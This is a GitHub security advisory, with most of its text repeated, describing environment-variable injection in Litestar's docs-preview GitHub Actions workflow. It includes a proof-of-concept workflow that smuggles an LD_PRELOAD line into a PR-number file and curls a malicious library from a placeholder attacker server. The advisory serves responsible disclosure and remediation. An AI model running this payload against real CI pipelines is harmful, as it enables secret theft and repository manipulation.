Headline
GHSA-4hq2-rpgc-r8r7: Litestar has an environment Variable injection in `docs-preview.yml` workflow
Summary
Litestar’s docs-preview.yml workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.
Environment Variable injection (GHSL-2024-177)
The docs-preview.yml workflow gets triggered when the Tests And Linting workflow completes:
on:
workflow_run:
workflows: [Tests And Linting]
types: [completed]
Later, it downloads and extracts an artifact generated by the triggering workflow:
- name: Download artifact
uses: dawidd6/action-download-artifact@v6
with:
workflow_conclusion: success
run_id: ${{ github.event.workflow_run.id }}
path: docs-preview
name: docs-preview
And reads docs-preview/.pr_number into an Environment Variable:
- name: Set PR number
run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV
The $GITHUB_ENV pointed file is just a regular file where every KEY=VALUE will be used to define a new Environment Variable after the step completes. Since the contents of the .pr_number file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.
An attacker can send a malicious .pr_number file with the following content:
111
LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so
Which will result in two Environment Variables being defined:
- PR_NUMBER=111
- LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so
In this example we are manipulating the LD_PRELOAD environment variable to force the system to load a malicious shared library called inject.so. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.
The following step will run the JamesIves/github-pages-deploy-action action which will run the node command. Therefore the LD_PRELOAD will execute arbitrary code when node gets executed:
- name: Deploy docs preview
uses: JamesIves/github-pages-deploy-action@v4
with:
folder: docs-preview/docs/_build/html
token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }}
repository-name: litestar-org/litestar-docs-preview
clean: false
target-folder: ${{ env.PR_NUMBER }}
branch: gh-pages
PoC
- Clone the repository
- Edit the
ci.ymlworkflow.
name: Tests And Linting
on:
pull_request:
jobs:
upload-patch:
runs-on: ubuntu-latest
timeout-minutes: 10
steps:
- name: Save PR number and payload
run: |
make payload
echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number
curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so
- name: Upload artifact
uses: actions/upload-artifact@v3
with:
name: docs-preview
path: payload
- Create a Pull Request with this change.
- Since the modified workflow is triggered on
pull_request, the attacker Pull Request will trigger it and upon completion will trigger the vulnerableDeploy documentation previewworkflow which will read the malicious artifact and pollute the Environment Variables.
Impact
This issue will grant a malicious actor the following permissions:
Issues: write
Metadata: read
PullRequests: write
In addition, the following secret will get exposed to the attacker: DOCS_PREVIEW_DEPLOY_TOKEN
Remediation
- Verify the contents of the downloaded artifacts.
- Do not allow new lines in the value redirected to GITHUB_ENV
Resources
- CodeQL for JavaScript - Expression injection in Actions
- Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
- Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests
Disclosure Policy
This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.
Note on vulnerability severity
This global advisory lists the vulnerability at low severity while the repository advisory and CVE record list the vulnerability at high severity because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar’s CI/CD environment rather than the litestar package.
Summary
Litestar’s docs-preview.yml workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.
Environment Variable injection (GHSL-2024-177)
The docs-preview.yml workflow gets triggered when the Tests And Linting workflow completes:
on: workflow_run: workflows: [Tests And Linting] types: [completed]
Later, it downloads and extracts an artifact generated by the triggering workflow:
- name: Download artifact uses: dawidd6/action-download-artifact@v6 with: workflow_conclusion: success run_id: ${{ github.event.workflow_run.id }} path: docs-preview name: docs-preview
And reads docs-preview/.pr_number into an Environment Variable:
- name: Set PR number run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV
The $GITHUB_ENV pointed file is just a regular file where every KEY=VALUE will be used to define a new Environment Variable after the step completes. Since the contents of the .pr_number file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.
An attacker can send a malicious .pr_number file with the following content:
111 LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so
Which will result in two Environment Variables being defined:
- PR_NUMBER=111
- LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so
In this example we are manipulating the LD_PRELOAD environment variable to force the system to load a malicious shared library called inject.so. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.
The following step will run the JamesIves/github-pages-deploy-action action which will run the node command. Therefore the LD_PRELOAD will execute arbitrary code when node gets executed:
- name: Deploy docs preview uses: JamesIves/github-pages-deploy-action@v4 with: folder: docs-preview/docs/_build/html token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }} repository-name: litestar-org/litestar-docs-preview clean: false target-folder: ${{ env.PR_NUMBER }} branch: gh-pages
PoC
- Clone the repository
- Edit the ci.yml workflow.
name: Tests And Linting
on: pull_request:
jobs: upload-patch: runs-on: ubuntu-latest timeout-minutes: 10 steps: - name: Save PR number and payload run: | make payload echo -e “${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so” > payload/.pr_number curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so - name: Upload artifact uses: actions/upload-artifact@v3 with: name: docs-preview path: payload
- Create a Pull Request with this change.
- Since the modified workflow is triggered on pull_request, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable Deploy documentation preview workflow which will read the malicious artifact and pollute the Environment Variables.
Impact
This issue will grant a malicious actor the following permissions:
Issues: write
Metadata: read
PullRequests: write
In addition, the following secret will get exposed to the attacker: DOCS_PREVIEW_DEPLOY_TOKEN
Remediation
- Verify the contents of the downloaded artifacts.
- Do not allow new lines in the value redirected to GITHUB_ENV
Resources
- CodeQL for JavaScript - Expression injection in Actions
- Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
- Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests
Disclosure Policy
This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.
Note on vulnerability severity
This global advisory lists the vulnerability at low severity while the repository advisory and CVE record list the vulnerability at high severity because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar’s CI/CD environment rather than the litestar package.
References
- GHSA-4hq2-rpgc-r8r7
- litestar-org/litestar@84d351e
- https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml